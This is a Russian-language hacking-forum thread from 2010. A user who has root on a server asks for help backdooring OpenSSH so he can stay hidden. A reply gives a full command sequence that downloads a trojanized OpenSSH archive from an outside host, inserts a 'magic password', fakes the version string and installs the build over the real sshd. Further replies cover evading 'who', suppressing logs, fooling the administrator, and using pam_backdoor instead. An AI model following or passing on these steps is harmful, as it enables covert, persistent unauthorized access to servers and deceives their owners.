Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   *nix (https://forum.antichat.xyz/forumdisplay.php?f=43)
-   -   Нужна помощь в затроянивании OpenSSH (https://forum.antichat.xyz/showthread.php?t=211449)

buncho 14.06.2010 15:42

Нужна помощь в затроянивании OpenSSH
 
Есть рут. Хочу стать невидимым:) Думаю оптимальным решением станет затроянивание SSH. Стоит OpenSSH_4.3p2. В сети нашел патч только для версий 4.4 и выше. Сам вникать и писать код пока не хочу. Кто может чем помочь?

slashd 14.06.2010 16:52

В файле version.h указать нужную версию, в includes.h прописать магический пароль вместо mAgic_p1ple. Перед make install не забыть сбекапить куда-нибудь /usr/bin/ssh и /usr/sbin/sshd.
Код:

# cd /tmp
# wget http://tools.xaker.ru/rulezzz.tar.gz.txt -O rul.tgz
# tar zxf rul.tgz
# cd openssh*
# vim version.h
# vim includes.h
# ./configure --sbindir=/usr/sbin --bindir=/usr/bin --with-pam --sysconfdir=/etc/ssh
# make && make install
# /etc/init.d/sshd restart


buncho 14.06.2010 17:13

Спасибо, а ничего что там версия 4.7?

kill -9 $$

да чтоб в логи не писалось и мэджик пасс был.

кстати если админ наберет команду who, то я спалюсь все равно?

и еще тупой вопрос: если демон не запуститься изза какой-либо ошибки, то всё, хана?

slashd 14.06.2010 19:25

Цитата:

Сообщение от kill -9 $$
ссш с сюрпризом или без? фпаду сурс смотреть :D

Без сюрпризов :)


Цитата:

Сообщение от buncho
кстати если админ наберет команду who, то я спалюсь все равно?

Если войдёшь под магическим паролем, то не спалишься.

Цитата:

Сообщение от buncho
и еще тупой вопрос: если демон не запуститься изза какой-либо ошибки, то всё, хана?

Если такое произойдёт, то восстанавливай из бекапа файлы sshd и ssh, затем перезапускай сервер.

diehard 14.06.2010 20:06

а какая тебе разница, что за версия там? Исправь в сорцах версию на ту что на сервере, админ разницы не почуствует.

buncho 14.06.2010 20:52

Цитата:

Сообщение от slashd
Если такое произойдёт, то восстанавливай из бекапа файлы sshd и ssh, затем перезапускай сервер.

так я ж по ssh сам на сервак захожу. если сервис вырубится как я тогда зайду? :confused:

slashd 14.06.2010 21:28

При рестарте sshd конекты не рвутся, так что есть возможность всё исправить.

svesve 15.06.2010 12:25

юзайте pam_backdoor меньше гемора.

тыц


Время: 03:42